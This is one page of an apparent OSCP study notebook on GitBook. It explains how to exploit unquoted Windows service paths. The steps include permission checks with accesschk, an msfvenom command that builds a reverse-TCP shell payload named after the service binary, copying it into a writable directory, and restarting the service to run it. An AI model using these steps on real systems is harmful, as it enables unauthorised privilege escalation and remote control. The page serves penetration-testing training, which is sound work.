✏️
OSCP
  • $WhoAmI?
  • Manual
  • NMAP
    • NSE Scripts
  • Steganography
  • Services Enumeration
    • Postgres Psql
    • SNMTP - 199
    • SSH - 22
    • TELNET - 23
    • RDP - 3389
    • DISTCCD - 3632
    • IMAP - 143
    • TFTP - UDP69
    • FTP - 21
    • HTTP 80/443
      • LFI to RCE
      • ShellShock
      • GIT
      • XXE, SQLI, CRLF, CSV,
      • CMS
      • Locations
        • Interested Linux Files
        • Logs
      • Command Injection
      • Remote File Inclusion (RFI)
      • File Upload Vulnerabilities
      • Remote Code Execution (RCE)
      • SQL Injection
      • Local File Inclusion (LFI)
        • LFI TO RCE
      • Web Enumeration
        • Patator BruteForce
        • ShellShock
        • Nikto
        • Anonymous Scanning
        • Fuzzers
        • DNS
    • SMB 139/445
      • SMB Exploit
      • SMB Enumerate
      • Send and Execute
      • Samba 2.2.x
    • RPC - 111
    • NFS
    • SNMP 161
    • SMTP 25
    • VNC - 5800
    • MYSQL - 3306
    • POP3 - 110
    • LDAP - 389
    • IRC 667
    • Java-RMI 1098/1099/1050
    • 1433 - MSSQL
  • Linux
    • Shells Linux
    • File Transfer
    • Linux Priv Esc
    • Fix Shell
    • Upload
    • Restricted Shell
  • Windows
    • File Transfer
    • Reverse Shell Cheatsheet
      • Full TTYs
      • Shells - Windows
      • MSFVENOM
    • Post Explotation
      • Nishang
      • Kernel Exploits
      • Service Exploits
      • Unquoted service paths
      • Mimikatz
    • BackDoors
    • EternalBlue MS17-010
    • Windows - Download and execute methods
    • Windows Priv Exc
    • Priv Esc Tools
    • ByPass UAC
      • Bypassing default UAC settings manually c++
      • EventVwr Bypass UAC Powershell
      • ByPass UAC Metasploit
      • Bypassing UAC with Kali’s bypassuac
      • Bypass UAC on Windows Vista
  • Password Attack
    • Intercepting Login Request
    • Windows Hashes
    • Linux Hashes
    • Wordlists
    • Brute Force Password Attacks & Cracking
    • Hashes
  • Network Pivoting Techniques
  • Buffer OverFlow
    • 6. Getting Shell
    • 5. Finding Bad Characters
    • 4. Overwrite EIP
    • 3. Finding The Offset
    • 2. Fuzzing
    • 1. Spiking
  • Downloads
  • Online Websites
  • Privilege Escalation History
  • Exploit
    • Unreal IRC
    • Sambacry
    • Shellshock
    • Padding Oracle Attack
Powered by GitBook
On this page

Was this helpful?

  1. Windows
  2. Post Explotation

Unquoted service paths

Unquoted service paths

A properly configured service path would look something like this:

"C:\Program Files (x86)\Common Files\Steam\SteamService.exe"

You might, however, come across a misconfigured service path during your OSCP exam. An unquoted service path would look something like this:

C:\Program Files (x86)\Common Files\Steam\SteamService.exe

This can be a vulnerability because Windows looks for service executables in hierarchical order.

It would look for ‘SteamService.exe’ in the following order:

  • Program Files (x86)

  • Common Files

  • Steam

This means that you could add a maliscious file called ‘SteamService.exe’ to the ‘Common Files’ directory if you have write permissions.

All you’d have to do then is restart the service to execute your maliscious file.

But first, you need to run a few checks because:

  • you might not have directory write permissions

  • You might be unable to restart the service

  • The service might not be running as an elevated user

Check for unquoted service paths with winPEAS

winpeas.exe

Do you have permissions to execute the service?

Download accesschk.exe to the target

accesschk.exe /accepteula -ucqv user <SERVICE>

Do you have write permissions for any of the directories? (Check each directory)

accesschk.exe /accepteula -uwdq "C:\DIRECTORY\PATH"

Example:

accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\"

accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Common Files\"

accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Common Files\Steam\"

Let’s assume you have write permssions for the ‘Common Files ‘ directory.

Generate a reverse shell payload:

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > SteamService.exe  # revere shell name should match the service .exe binary

Download your payload to the target and copy into the writeable directory:

copy SteamService.exe "C:\Program Files (x86)\Common Files\SteamService.exe"

Setup a listener in Metasploit and restart the service:

net stop <SERVICE>
net start <SERVICE>
PreviousService ExploitsNextMimikatz

Last updated 4 years ago

Was this helpful?